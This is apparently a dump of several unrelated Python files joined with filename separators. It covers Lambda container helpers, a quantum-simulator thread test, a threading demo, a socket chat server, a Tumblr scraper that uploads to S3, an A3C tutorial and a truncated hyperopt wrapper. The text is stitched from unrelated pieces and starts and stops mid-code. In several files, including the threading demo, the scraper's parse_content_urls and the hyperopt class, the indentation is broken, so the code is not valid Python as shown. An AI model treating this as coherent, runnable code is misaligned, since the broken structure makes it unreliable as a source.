    """Assorted helpers for building docker/java commands."""

    # lazily-discovered port for remote Java debugging (False until first resolved)
    debug_java_port = False

    @classmethod
    def get_java_opts(cls):
        """Return the JVM options from LAMBDA_JAVA_OPTS, resolving any debug port placeholder."""
        opts = config.LAMBDA_JAVA_OPTS or ''
        if '_debug_port_' not in opts:
            # no placeholder given - try to pick up an explicitly configured debug port
            match = re.match('.*address=(\\d+).*', opts)
            if match is not None:
                cls.debug_java_port = match.groups()[0]
            return opts
        # substitute the _debug_port_ placeholder with a (cached) free TCP port
        if not cls.debug_java_port:
            cls.debug_java_port = get_free_tcp_port()
        return opts.replace('_debug_port_', '%s' % cls.debug_java_port)

    @classmethod
    def get_host_path_for_path_in_docker(cls, path):
        """Map a path under the localstack tmp folder to the corresponding path on the docker host."""
        pattern = r'^%s/(.*)$' % config.TMP_FOLDER
        replacement = r'%s/\1' % config.HOST_TMP_FOLDER
        return re.sub(pattern, replacement, path)

    @classmethod
    def format_windows_path(cls, path):
        """Convert a Windows path (e.g. 'C:\\tmp\\x') into a docker volume mount path."""
        converted = path.replace(':', '').replace('\\', '/')
        if len(converted) >= 1 and converted[:1] != '/':
            converted = '/' + converted
        return '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, converted)

    @classmethod
    def docker_image_for_runtime(cls, runtime):
        """Return the (double-quoted) docker image reference for the given Lambda runtime."""
        registry = config.LAMBDA_CONTAINER_REGISTRY
        tag = runtime
        # TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
        # See https://github.com/lambci/docker-lambda/pull/218
        prefixed_runtimes = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
        if registry == 'lambci/lambda' and any(img in tag for img in prefixed_runtimes):
            tag = '20191117-%s' % tag
        return '"%s:%s"' % (registry, tag)

    @classmethod
    def get_docker_remove_flag(cls):
        """Return '--rm' if containers should be auto-removed after running, else ''."""
        if config.LAMBDA_REMOVE_CONTAINERS:
            return '--rm'
        return ''

    @classmethod
    def get_java_classpath(cls, archive):
        """
        Return the Java classpath, using the parent folder of the
        given archive as the base folder.
        The result contains any *.jar files in the base folder, as
        well as any JAR files in the "lib/*" subfolder living
        alongside the supplied java archive (.jar or .zip).
        :param archive: an absolute path to a .jar or .zip Java archive
        :return: the Java classpath, relative to the base dir of "archive"
        """
        base_dir = os.path.dirname(archive)
        archive_real = os.path.realpath(archive)
        entries = ['.']
        for glob_pattern in ('%s/*.jar', '%s/lib/*.jar', '%s/*.zip'):
            for match in glob.glob(glob_pattern % base_dir):
                if os.path.realpath(match) != archive_real:
                    entries.append(os.path.relpath(match, base_dir))
        # make sure to append the localstack-utils.jar at the end of the classpath
        # https://github.com/localstack/localstack/issues/1160
        entries.append(os.path.relpath(archive, base_dir))
        return ':'.join(entries)
# --------------
# GLOBAL STATE
# --------------
# singleton executor instances, created once at import time
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
# executor used when no (or an unknown) LAMBDA_EXECUTOR value is configured
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
    'local': EXECUTOR_LOCAL,
    'docker': EXECUTOR_CONTAINERS_SEPARATE,
    'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
test_measuring_from_threads.py | import threading
import random
import time
from eqsn import EQSN
def test_measure_from_threads():
    """Stress test: apply H gates to a set of entangled qubits concurrently from many threads."""
    simulator = EQSN()

    def apply_hadamards(qubit_id):
        # apply a random number (10..19) of H gates, pausing briefly between them
        repetitions = random.randrange(10, 20, 1)
        for _ in range(repetitions):
            time.sleep(0.1)
            simulator.H_gate(qubit_id)

    qubit_ids = [str(index) for index in range(10)]
    for qubit_id in qubit_ids:
        simulator.new_qubit(qubit_id)
    control = qubit_ids[0]
    # entangle every other qubit with the first one
    for target in qubit_ids[1:]:
        simulator.cnot_gate(control, target)
    workers = [threading.Thread(target=apply_hadamards, args=(qubit_id,)) for qubit_id in qubit_ids]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    simulator.stop_all()
if __name__ == "__main__":
    # allow running this test directly as a script
    test_measure_from_threads()
    exit(0)
|
threading_endTime.py | import threading
import time
def thread():
    """Simulated worker: sleep for two seconds, then report completion."""
    delay_seconds = 2
    time.sleep(delay_seconds)
    print('---子线程结束---')  # "child thread finished"
def main():
    """Start a daemon worker thread, wait at most 1 second for it, then exit.

    Demonstrates join() semantics:
    1. With timeout=1, the main thread blocks for 1s and then continues.
    2. Without a timeout, join() would block until the worker finishes.
    3. Because the worker is a daemon and sleeps for 2s, it is still running
       when the main thread exits, and interpreter shutdown kills it.
    """
    t1 = threading.Thread(target=thread)
    # assigning the 'daemon' attribute replaces the deprecated setDaemon() API
    t1.daemon = True
    t1.start()
    t1.join(timeout=1)
    print('---主线程结束---')  # "main thread finished"
if __name__ == '__main__':
main() |
server.py | from socket import *
import threading as th
from time import sleep
'''
Server functionality:
1) Main server listens to a port
2) When a connection is established it starts a new thread to host this client (the client gets unique id
3) Thread function executes until connection is done
4) Thread function first checks for any messages to be sent to the client and sends them if any;
then it asks the client to send any messages (so the client is mostly waiting for data and handles either
incoming messages or a request for its own message; the client responds to the second request only)
5) Commands:
REG <alias><eol> (client-to-server. server responds with <id> or 0 if failed)
MSG <text><eol> (both directions)
RTT<eol> (server-to-client, request to talk)
TRM (client-to-server, client disconnects)
'''
'''
Message format:
{"from": from_alias, "to": to_alias, "from_id": from_id, "to_id": to_id, "message": "test message"}
'''
def debug(s):
    """Print a debug message followed by an extra blank line."""
    print(s + "\n")
class Server:
    """Minimal threaded chat server: one handler thread per connected client.

    Client pool entries map client id -> {"thread", "id", "address", "messages", "lock"}.
    Protocol commands (see module docstring): REG, MSG, RTT, NOP, TRM.
    """
    HOST = "localhost"
    PORT = 8765
    MAX_CLIENTS = 5

    def __init__(self):
        self.client_pool = {}
        self.client_pool_lock = th.Lock()
        self.socket = socket(AF_INET, SOCK_STREAM)
        self.socket.bind((Server.HOST, Server.PORT))
        self.server_stop = False

    def thread_proc(self, connection, my_id):
        """Per-client loop: flush queued messages to the client, then poll it for new ones."""
        debug("client handle thread started with id %d" % my_id)
        with self.client_pool_lock:
            data = self.client_pool[my_id]
        while not self.server_stop:
            # first of all check for messages to send to the client
            if len(data["messages"]) > 0:
                with data["lock"]:
                    for m in data["messages"]:
                        self.send_message(connection, {"message": m})
                    data["messages"] = []
            # then check if the client has a message
            self.request_for_message(connection)
            msg = self.wait_for_message(connection)
            if msg:
                self.broadcast(my_id, {"message": msg})
            else:
                sleep(0.1)
                continue

    def broadcast(self, src_id, msg):
        """Queue msg["message"] for every connected client (including the sender)."""
        with self.client_pool_lock:
            for dst_id, data in self.client_pool.items():
                data["messages"].append(msg["message"])

    def private(self, src_id, dst_id, msg):
        """Queue a message for a single client.

        NOTE(review): this appends the whole msg object, while broadcast() appends
        msg["message"] - confirm which shape the send path expects before relying on it.
        """
        with self.client_pool_lock:
            self.client_pool[dst_id]["messages"].append(msg)

    def send_message(self, conn, msg):
        """Send a MSG command carrying msg["message"] to the client."""
        conn.send(bytes("MSG " + msg["message"] + "\n", "utf-8"))

    def request_for_message(self, conn):
        """Send an RTT ("request to talk") command, inviting the client to send a message."""
        conn.send(bytes("RTT\n", "utf-8"))

    def wait_for_message(self, conn):
        """Read the client's response; return its message text, or '' if there is none."""
        data = str(conn.recv(1024), "utf-8")
        if not data:
            # empty read - connection is likely broken; treat as "no message"
            return ""
        elif data[:3] == "NOP":
            return ""
        elif data[:3] == "MSG":
            return data[4:]
        # unknown command - ignore it and report "no message"
        return ""

    def terminate(self, conn):
        """Tell the client to disconnect."""
        conn.send(bytes("TRM\n", "utf-8"))

    def start(self):
        """Accept connections forever, spawning one handler thread per client."""
        self.socket.listen(Server.MAX_CLIENTS)
        debug("server is listening on port %d" % Server.PORT)
        self.latest_id = 0
        self.server_stop = False
        while not self.server_stop:
            connection, address = self.socket.accept()
            self.latest_id += 1
            thread = th.Thread(target=self.thread_proc, args=(connection, self.latest_id))
            data = {"thread": thread, "id": self.latest_id, "address": address, "messages": [], "lock": th.Lock()}
            # guard pool mutation, consistent with the other client_pool accesses
            with self.client_pool_lock:
                self.client_pool[self.latest_id] = data
            thread.start()

    def stop(self):
        """Signal all handler threads to finish and wait for them to exit."""
        self.server_stop = True
        # iterate over the pool entries (dicts), not the dict itself: iterating the
        # dict directly yields integer client ids and c["thread"] would raise TypeError
        for data in self.client_pool.values():
            data["thread"].join()
if __name__ == "__main__":
    # run the chat server when executed as a script (blocks, accepting connections)
    Server().start()
"""
https://docs.python.org/3.5/library/socketserver.html?highlight=socketserver#module-socketserver
http://stackoverflow.com/questions/8627986/how-to-keep-a-socket-open-until-client-closes-it
""" |
scrape.py | import pytumblr
from threading import Thread
import requests
import logging
import json
from boto.s3.connection import S3Connection
import time
import sys
class Scrape():
    """Continuously scrape Tumblr posts for a tag and archive them (JSON + images) to S3.

    NOTE(review): uses raw_input(), which only exists in Python 2 - confirm the target
    interpreter, or switch to input() for Python 3.
    """

    def __init__(self, aws_access_key, aws_secret_key, s3_bucket, tumblr_api_key, tag, refresh_period=1.0):
        # :param refresh_period: seconds to sleep between scrape iterations
        self.tumblr_client = pytumblr.TumblrRestClient(tumblr_api_key)
        s3_client = S3Connection(aws_access_key, aws_secret_key)
        self.bucket = s3_client.get_bucket(s3_bucket)
        # List the files in our bucket, find jsons and remove them, leaving the id, then setify it. That way we don't
        # download the same file twice
        self.scraped_ids = set([filename.key[:-5] for filename in self.bucket.get_all_keys() if filename.key[-5:]=='.json'])
        self.tag = tag
        self.refresh_period = refresh_period
        self.scraping = False

    def input_thread(self):
        """Block until the user presses Enter, then flag the scrape loop to stop."""
        raw_input("")
        self.scraping = False

    def start(self):
        """Run the scrape loop until stopped, spawning one post-fetching thread per iteration."""
        logging.info("Starting scrape.")
        self.scraping = True
        i = 1
        # background thread that watches stdin so the user can stop the loop
        interrupt_thread = Thread(target=self.input_thread)
        interrupt_thread.start()
        while self.scraping:
            # simple spinner: | / - \ cycling with the iteration counter
            loader = {0: '|', 1: '/', 2: '-', 3: '\\'}
            sys.stdout.write('\r')
            sys.stdout.flush()
            sys.stdout.write("Scrape #" + str(i) + " " + loader[i % 4] + " Press any key to stop")
            # Spin off a thread to get the posts. This doesn't technically need to be in a thread, but I wanted
            # to future proof it in case I want to get multiple tags concurrently.
            t = Thread(target=self.post_thread)
            t.start()
            t.join()
            time.sleep(self.refresh_period)
            i += 1

    def stop(self):
        """Flag the scrape loop to stop after the current iteration."""
        sys.stdout.flush()
        self.scraping = False

    def post_thread(self):
        """Fetch the latest tagged posts and upload each one's content in its own thread."""
        response = self.tumblr_client.tagged(self.tag)
        content_list = self.parse_content_urls(response)
        image_threads = []
        # Loop through the posts that got returned, then spin off threads to download the images associated with them.
        for content in content_list:
            image_threads.append(Thread(target=self.upload_content, args=(content,)))
            image_threads[-1].start()
        # Wait for all the images to download before we close the post thread.
        for image_thread in image_threads:
            image_thread.join()

    def upload_content(self, content):
        """Upload one post to S3: its JSON under '<id>.json' and, if present, its image
        under '<id>/<filename>'. Skips posts whose id was already scraped.

        :param content: (post_id, post_dict, image_url_or_None) tuple from parse_content_urls
        """
        id = str(content[0])
        post = content[1]
        if id in self.scraped_ids:
            return
        if content[2] is not None:
            img_url = content[2]
            img_filename = img_url.split('/')[-1]
            # We put the image in a directory with the post id in the directory name
            image_key = self.bucket.new_key(id+'/'+img_filename)
            r = requests.get(img_url)
            # only store the post JSON if the image download succeeded
            if r.status_code == 200:
                json_key = self.bucket.new_key(id + '.json')
                json_key.set_contents_from_string(json.dumps(post))
                image_key.content_type = r.headers['content-type']
                image_key.set_contents_from_string(r.content)
        else:
            # no image: store just the post JSON
            json_key = self.bucket.new_key(id + '.json')
            json_key.set_contents_from_string(json.dumps(post))
def parse_content_urls(self, posts):
content = []
# If the post doesn't have one and only one photo in it, we will still save the json (for later), but won't
# download any photos.
for post in posts:
id = post['id']
if post['type'] == 'photo' and len(post['photos']) == 1:
img_url=post['photos'][0]['original_size']['url']
content.append((id, post, img_url))
else:
content.append((id, post, None))
return content |
tutorial_A3C.py | """
Asynchronous Advantage Actor Critic (A3C) with Continuous Action Space.
Actor Critic History
----------------------
A3C > DDPG (for continuous action space) > AC
Advantage
----------
Train faster and more stable than AC.
Disadvantage
-------------
Have bias.
Reference
----------
Original Paper: https://arxiv.org/pdf/1602.01783.pdf
MorvanZhou's tutorial: https://morvanzhou.github.io/tutorials/
MorvanZhou's code: https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/experiments/Solve_BipedalWalker/A3C.py
Environment
-----------
BipedalWalker-v2 : https://gym.openai.com/envs/BipedalWalker-v2
Reward is given for moving forward, total 300+ points up to the far end.
If the robot falls, it gets -100. Applying motor torque costs a small amount of
points, more optimal agent will get better score. State consists of hull angle
speed, angular velocity, horizontal speed, vertical speed, position of joints
and joints angular speed, legs contact with ground, and 10 lidar rangefinder
measurements. There's no coordinates in the state vector.
Prerequisites
--------------
tensorflow 2.0.0a0
tensorflow-probability 0.6.0
tensorlayer 2.0.0
&&
pip install box2d box2d-kengz --user
To run
------
python tutorial_A3C.py --train/test
"""
import argparse
import multiprocessing
import threading
import time
import numpy as np
import gym
import tensorflow as tf
import tensorflow_probability as tfp
import tensorlayer as tl
from tensorlayer.layers import DenseLayer, InputLayer
tfd = tfp.distributions
tl.logging.set_verbosity(tl.logging.DEBUG)
# Fix RNG seeds so runs are reproducible.
np.random.seed(2)
tf.random.set_seed(2)  # reproducible

# add arguments in command --train/test
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=True)
args = parser.parse_args()

#####################  hyper parameters  ####################
GAME = 'BipedalWalker-v2'  # BipedalWalkerHardcore-v2 BipedalWalker-v2 LunarLanderContinuous-v2
LOG_DIR = './log'  # the log file
N_WORKERS = multiprocessing.cpu_count()  # number of workers according to number of cores in cpu
# N_WORKERS = 2     # manually set number of workers
MAX_GLOBAL_EP = 8  # number of training episodes
GLOBAL_NET_SCOPE = 'Global_Net'  # name scope of the shared (global) network
UPDATE_GLOBAL_ITER = 10  # update global policy after several episodes
GAMMA = 0.99  # reward discount factor
ENTROPY_BETA = 0.005  # factor for entropy boosted exploration
LR_A = 0.00005  # learning rate for actor
LR_C = 0.0001  # learning rate for critic
GLOBAL_RUNNING_R = []  # moving-average episode rewards, appended by workers
GLOBAL_EP = 0  # will increase during training, stop training when it >= MAX_GLOBAL_EP
################### Asynchronous Advantage Actor Critic (A3C) ####################################
class ACNet(object):
    """Actor-Critic network for A3C.

    Used both as the single global network and as each worker's local
    network; local gradients are applied directly to the global network's
    weights (see ``update_global``).

    NOTE(review): relies on module-level globals ``N_S``, ``N_A``,
    ``A_BOUND``, ``OPT_A``, ``OPT_C`` being defined before use — they are
    created in the ``__main__`` block.
    """

    def __init__(self, scope, globalAC=None):
        # scope: name scope for this net's ops; globalAC: the shared net
        # (None when constructing the global net itself).
        self.scope = scope
        self.save_path = './model'

        w_init = tf.keras.initializers.glorot_normal(seed=None)  # initializer, glorot=xavier

        def get_actor(input_shape):  # policy network: state -> (mu, sigma) of a Gaussian policy
            with tf.name_scope(self.scope):
                ni = tl.layers.Input(input_shape, name='in')
                nn = tl.layers.Dense(n_units=500, act=tf.nn.relu6, W_init=w_init, name='la')(ni)
                nn = tl.layers.Dense(n_units=300, act=tf.nn.relu6, W_init=w_init, name='la2')(nn)
                mu = tl.layers.Dense(n_units=N_A, act=tf.nn.tanh, W_init=w_init, name='mu')(nn)
                sigma = tl.layers.Dense(n_units=N_A, act=tf.nn.softplus, W_init=w_init, name='sigma')(nn)
                return tl.models.Model(inputs=ni, outputs=[mu, sigma], name=scope + '/Actor')

        self.actor = get_actor([None, N_S])
        self.actor.train()  # train mode for Dropout, BatchNorm

        def get_critic(input_shape):  # we use Value-function here, but not Q-function.
            with tf.name_scope(self.scope):
                ni = tl.layers.Input(input_shape, name='in')
                nn = tl.layers.Dense(n_units=500, act=tf.nn.relu6, W_init=w_init, name='lc')(ni)
                nn = tl.layers.Dense(n_units=300, act=tf.nn.relu6, W_init=w_init, name='lc2')(nn)
                v = tl.layers.Dense(n_units=1, W_init=w_init, name='v')(nn)
                return tl.models.Model(inputs=ni, outputs=v, name=scope + '/Critic')

        self.critic = get_critic([None, N_S])
        self.critic.train()  # train mode for Dropout, BatchNorm

    @tf.function  # convert numpy functions to tf.Operations in the TF graph, return tensor
    def update_global(
            self, buffer_s, buffer_a, buffer_v_target, globalAC
    ):  # refer to the global Actor-Critic network for updating it with samples
        """Compute losses on this worker's batch and apply the resulting
        gradients to the *global* network's weights."""
        ''' update the global critic '''
        with tf.GradientTape() as tape:
            self.v = self.critic(buffer_s)
            self.v_target = buffer_v_target
            td = tf.subtract(self.v_target, self.v, name='TD_error')
            self.c_loss = tf.reduce_mean(tf.square(td))
        self.c_grads = tape.gradient(self.c_loss, self.critic.trainable_weights)
        OPT_C.apply_gradients(zip(self.c_grads, globalAC.critic.trainable_weights))  # local grads applies to global net
        ''' update the global actor '''
        with tf.GradientTape() as tape:
            self.mu, self.sigma = self.actor(buffer_s)
            self.test = self.sigma[0]
            self.mu, self.sigma = self.mu * A_BOUND[1], self.sigma + 1e-5  # scale mean to action range; keep sigma > 0
            normal_dist = tfd.Normal(self.mu, self.sigma)  # no tf.contrib for tf2.0
            self.a_his = buffer_a  # float32
            log_prob = normal_dist.log_prob(self.a_his)
            exp_v = log_prob * td  # td is from the critic part, no gradients for it
            entropy = normal_dist.entropy()  # encourage exploration
            self.exp_v = ENTROPY_BETA * entropy + exp_v
            self.a_loss = tf.reduce_mean(-self.exp_v)
        self.a_grads = tape.gradient(self.a_loss, self.actor.trainable_weights)
        OPT_A.apply_gradients(zip(self.a_grads, globalAC.actor.trainable_weights))  # local grads applies to global net
        return self.test  # for test purpose

    @tf.function
    def pull_global(self, globalAC):  # run by a local, pull weights from the global nets
        # Overwrite local weights with the current global weights.
        for l_p, g_p in zip(self.actor.trainable_weights, globalAC.actor.trainable_weights):
            l_p.assign(g_p)
        for l_p, g_p in zip(self.critic.trainable_weights, globalAC.critic.trainable_weights):
            l_p.assign(g_p)

    def choose_action(self, s):  # run by a local
        """Sample an action for state ``s`` from the current Gaussian policy."""
        s = s[np.newaxis, :]  # add batch dimension
        self.mu, self.sigma = self.actor(s)
        with tf.name_scope('wrap_a_out'):
            self.mu, self.sigma = self.mu * A_BOUND[1], self.sigma + 1e-5
        normal_dist = tfd.Normal(self.mu, self.sigma)  # for continuous action space
        self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=0), *A_BOUND)
        return self.A.numpy()[0]

    def save_ckpt(self):  # save trained weights
        tl.files.save_npz(self.actor.trainable_weights, name='model_actor.npz')
        tl.files.save_npz(self.critic.trainable_weights, name='model_critic.npz')

    def load_ckpt(self):  # load trained weights
        tl.files.load_and_assign_npz(name='model_actor.npz', network=self.actor)
        tl.files.load_and_assign_npz(name='model_critic.npz', network=self.critic)
class Worker(object):
    """One A3C worker: owns a private environment and a local ACNet, and
    periodically pushes gradients to / pulls weights from the global net.

    NOTE(review): reads module-level globals ``COORD`` and ``t0`` that are
    only created in the ``__main__`` training branch.
    """

    def __init__(self, name, globalAC):
        self.env = gym.make(GAME)  # each worker gets its own environment
        self.name = name
        self.AC = ACNet(name, globalAC)  # local copy of the actor-critic

    def work(self, globalAC):
        """Run episodes until the coordinator stops or GLOBAL_EP reaches
        MAX_GLOBAL_EP, updating the global net every UPDATE_GLOBAL_ITER
        steps (or at episode end)."""
        global GLOBAL_RUNNING_R, GLOBAL_EP
        total_step = 1
        buffer_s, buffer_a, buffer_r = [], [], []
        while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
            s = self.env.reset()
            ep_r = 0
            while True:
                # visualize Worker_0 during training
                if self.name == 'Worker_0' and total_step % 30 == 0:
                    self.env.render()
                s = s.astype('float32')  # double to float
                a = self.AC.choose_action(s)
                s_, r, done, _info = self.env.step(a)
                s_ = s_.astype('float32')  # double to float

                # set robot falls reward to -2 instead of -100
                if r == -100: r = -2

                ep_r += r
                buffer_s.append(s)
                buffer_a.append(a)
                buffer_r.append(r)

                if total_step % UPDATE_GLOBAL_ITER == 0 or done:  # update global and assign to local net
                    if done:
                        v_s_ = 0  # terminal state has zero value
                    else:
                        v_s_ = self.AC.critic(s_[np.newaxis, :])[0, 0]  # reduce dim from 2 to 0
                    # Compute discounted n-step returns, walking backwards.
                    buffer_v_target = []
                    for r in buffer_r[::-1]:  # reverse buffer r
                        v_s_ = r + GAMMA * v_s_
                        buffer_v_target.append(v_s_)
                    buffer_v_target.reverse()

                    buffer_s, buffer_a, buffer_v_target = (
                        np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
                    )
                    # update gradients on global network
                    self.AC.update_global(buffer_s, buffer_a, buffer_v_target.astype('float32'), globalAC)
                    buffer_s, buffer_a, buffer_r = [], [], []
                    # update local network from global network
                    self.AC.pull_global(globalAC)

                s = s_
                total_step += 1
                if done:
                    if len(GLOBAL_RUNNING_R) == 0:  # record running episode reward
                        GLOBAL_RUNNING_R.append(ep_r)
                    else:  # moving average
                        GLOBAL_RUNNING_R.append(0.95 * GLOBAL_RUNNING_R[-1] + 0.05 * ep_r)
                    print('{}, Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'\
                        .format(self.name, GLOBAL_EP, MAX_GLOBAL_EP, ep_r, time.time()-t0 ))
                    GLOBAL_EP += 1
                    break
if __name__ == "__main__":
    env = gym.make(GAME)

    N_S = env.observation_space.shape[0]  # state dimension
    N_A = env.action_space.shape[0]  # action dimension
    A_BOUND = [env.action_space.low, env.action_space.high]  # per-dimension action bounds
    A_BOUND[0] = A_BOUND[0].reshape(1, N_A)
    A_BOUND[1] = A_BOUND[1].reshape(1, N_A)

    if args.train:
        # ============================= TRAINING ===============================
        t0 = time.time()
        with tf.device("/cpu:0"):
            OPT_A = tf.optimizers.RMSprop(LR_A, name='RMSPropA')
            OPT_C = tf.optimizers.RMSprop(LR_C, name='RMSPropC')
            GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE)  # we only need its params
        workers = []
        # Create one worker (with its own env and local net) per core.
        for i in range(N_WORKERS):
            i_name = 'Worker_%i' % i  # worker name
            workers.append(Worker(i_name, GLOBAL_AC))

        COORD = tf.train.Coordinator()

        # Start the worker threads. Pass the bound method as the thread
        # target directly: the original `job = lambda: worker.work(...)`
        # closed over the loop variable late, so a thread could pick up a
        # later `worker` and some Worker objects would never run (or run
        # twice).
        worker_threads = []
        for worker in workers:
            t = threading.Thread(target=worker.work, args=(GLOBAL_AC,))
            t.start()
            worker_threads.append(t)
        COORD.join(worker_threads)

        import matplotlib.pyplot as plt
        plt.plot(GLOBAL_RUNNING_R)
        plt.xlabel('episode')
        plt.ylabel('global running reward')
        plt.savefig('a3c.png')
        plt.show()

        GLOBAL_AC.save_ckpt()

    if args.test:
        # ============================= EVALUATION =============================
        if not args.train:
            # GLOBAL_AC is only built in the training branch; when running
            # with --test alone it must be constructed here before its
            # weights can be loaded (previously this raised a NameError).
            GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE)
        GLOBAL_AC.load_ckpt()
        while True:
            s = env.reset()
            rall = 0
            while True:
                env.render()
                s = s.astype('float32')  # double to float
                a = GLOBAL_AC.choose_action(s)
                s, r, d, _ = env.step(a)
                rall += r
                if d:
                    print("reward", rall)
                    break
|
hyperopt.py | # Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import multiprocessing
import sys
import time
import traceback
import warnings
from typing import Any, Dict, Optional
import hyperopt
import numpy as np
import pandas as pd
from hyperopt.exceptions import AllTrialsFailed
from sklearn.metrics import check_scoring, log_loss
from sklearn.model_selection import train_test_split
from sklearn.model_selection._split import check_cv
import lale.docstrings
import lale.helpers
import lale.operators
from lale.helpers import (
create_instance_from_hyperopt_search_space,
cross_val_score_track_trials,
)
from lale.lib.sklearn import LogisticRegression
from lale.search.op2hp import hyperopt_search_space
from lale.search.PGO import PGO
# Fixed RNG seed so hyperopt's search is reproducible across runs.
SEED = 42
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR)
class HyperoptImpl:
def __init__(
    self,
    estimator=None,
    max_evals=50,
    frac_evals_with_defaults=0,
    algo="tpe",
    cv=5,
    handle_cv_failure=False,
    scoring=None,
    best_score=0.0,
    max_opt_time=None,
    max_eval_time=None,
    pgo: Optional[PGO] = None,
    show_progressbar=True,
    args_to_scorer=None,
    verbose=False,
):
    """Configure the optimizer; no search happens until fit() is called.

    Defaults: a LogisticRegression estimator when none is given, and a
    scoring metric of 'accuracy' (classifiers) or 'r2' (regressors) when
    scoring is None.
    """
    self.max_evals = max_evals
    self.estimator = LogisticRegression() if estimator is None else estimator
    # Number of trials to spend on the all-defaults search space.
    self.evals_with_defaults = (
        int(frac_evals_with_defaults * max_evals)
        if frac_evals_with_defaults > 0
        else 0
    )
    self.algo = algo
    if scoring is None:
        scoring = "accuracy" if self.estimator.is_classifier() else "r2"
    self.scoring = scoring
    self.best_score = best_score
    self.handle_cv_failure = handle_cv_failure
    self.cv = cv
    # Separate trial books for the main search and the defaults search.
    self._trials = hyperopt.Trials()
    self._default_trials = hyperopt.Trials()
    self.max_opt_time = max_opt_time
    self.max_eval_time = max_eval_time
    self.pgo = pgo
    self.show_progressbar = show_progressbar
    self.args_to_scorer = {} if args_to_scorer is None else args_to_scorer
    self.verbose = verbose
def _summarize_statuses(self):
    """Print a one-line summary when any trial finished with STATUS_FAIL."""
    statuses = self._trials.statuses()
    counts = {}
    for status in statuses:
        counts[status] = counts.get(status, 0) + 1
    if hyperopt.STATUS_FAIL not in counts:
        return
    n_fail = counts[hyperopt.STATUS_FAIL]
    print(
        f"{n_fail} out of {len(statuses)} trials failed, call summary() for details."
    )
    if not self.verbose:
        print("Run with verbose=True to see per-trial exceptions.")
def fit(self, X_train, y_train):
    """Search the estimator's hyperparameter space with hyperopt.

    Runs up to ``self.max_evals`` trials (optionally spending
    ``self.evals_with_defaults`` of them on a frozen, all-defaults search
    space), scoring each configuration by cross validation, then refits
    the best configuration on all of ``X_train``/``y_train``.

    Sets ``self._best_estimator`` to the refitted pipeline, or to None
    when no trial succeeded, and returns ``self``.

    Raises
    ------
    ValueError
        When every trial fails (AllTrialsFailed from hyperopt and no
        STATUS_OK in the trial book).
    """
    opt_start_time = time.time()
    is_clf = self.estimator.is_classifier()
    # Resolve the cv parameter (int or splitter object) into a concrete splitter.
    self.cv = check_cv(self.cv, y=y_train, classifier=is_clf)
    data_schema = lale.helpers.fold_schema(X_train, y_train, self.cv, is_clf)
    self.search_space = hyperopt.hp.choice(
        "meta_model",
        [
            hyperopt_search_space(
                self.estimator, pgo=self.pgo, data_schema=data_schema
            )
        ],
    )
    # Create a search space with default hyperparameters for all trainable parts of the pipeline.
    # This search space is used for `frac_evals_with_defaults` fraction of the total trials.
    try:
        self.search_space_with_defaults = hyperopt.hp.choice(
            "meta_model",
            [
                hyperopt_search_space(
                    self.estimator.freeze_trainable(),
                    pgo=self.pgo,
                    data_schema=data_schema,
                )
            ],
        )
    except Exception:
        logger.warning(
            "Exception caught during generation of default search space, setting frac_evals_with_defaults to zero."
        )
        self.evals_with_defaults = 0

    def hyperopt_train_test(params, X_train, y_train):
        # Evaluate one configuration; returns (cv_score, logloss, execution_time).
        warnings.filterwarnings("ignore")
        trainable = create_instance_from_hyperopt_search_space(
            self.estimator, params
        )
        try:
            cv_score, logloss, execution_time = cross_val_score_track_trials(
                trainable,
                X_train,
                y_train,
                cv=self.cv,
                scoring=self.scoring,
                args_to_scorer=self.args_to_scorer,
            )
            logger.debug(
                "Successful trial of hyperopt with hyperparameters:{}".format(
                    params
                )
            )
        except BaseException as e:
            # If there is any error in cross validation, use the score based on a random train-test split as the evaluation criterion
            if self.handle_cv_failure:
                (
                    X_train_part,
                    X_validation,
                    y_train_part,
                    y_validation,
                ) = train_test_split(X_train, y_train, test_size=0.20)
                start = time.time()
                trained = trainable.fit(X_train_part, y_train_part)
                scorer = check_scoring(trainable, scoring=self.scoring)
                cv_score = scorer(
                    trained, X_validation, y_validation, **self.args_to_scorer
                )
                execution_time = time.time() - start
                y_pred_proba = trained.predict_proba(X_validation)
                try:
                    logloss = log_loss(y_true=y_validation, y_pred=y_pred_proba)
                except BaseException:
                    # log_loss needs valid probability output; report 0 when unavailable.
                    logloss = 0
                    logger.debug("Warning, log loss cannot be computed")
            else:
                logger.debug(e)
                logger.debug(
                    "Error {} with pipeline:{}".format(e, trainable.to_json())
                )
                raise e
        return cv_score, logloss, execution_time

    def merge_trials(trials1, trials2):
        # Append the trial documents of trials2 into trials1, renumbering
        # their tids past trials1's maximum so they do not collide.
        max_tid = max([trial["tid"] for trial in trials1.trials])
        for trial in trials2:
            tid = trial["tid"] + max_tid + 1
            hyperopt_trial = hyperopt.Trials().new_trial_docs(
                tids=[None], specs=[None], results=[None], miscs=[None]
            )
            hyperopt_trial[0] = trial
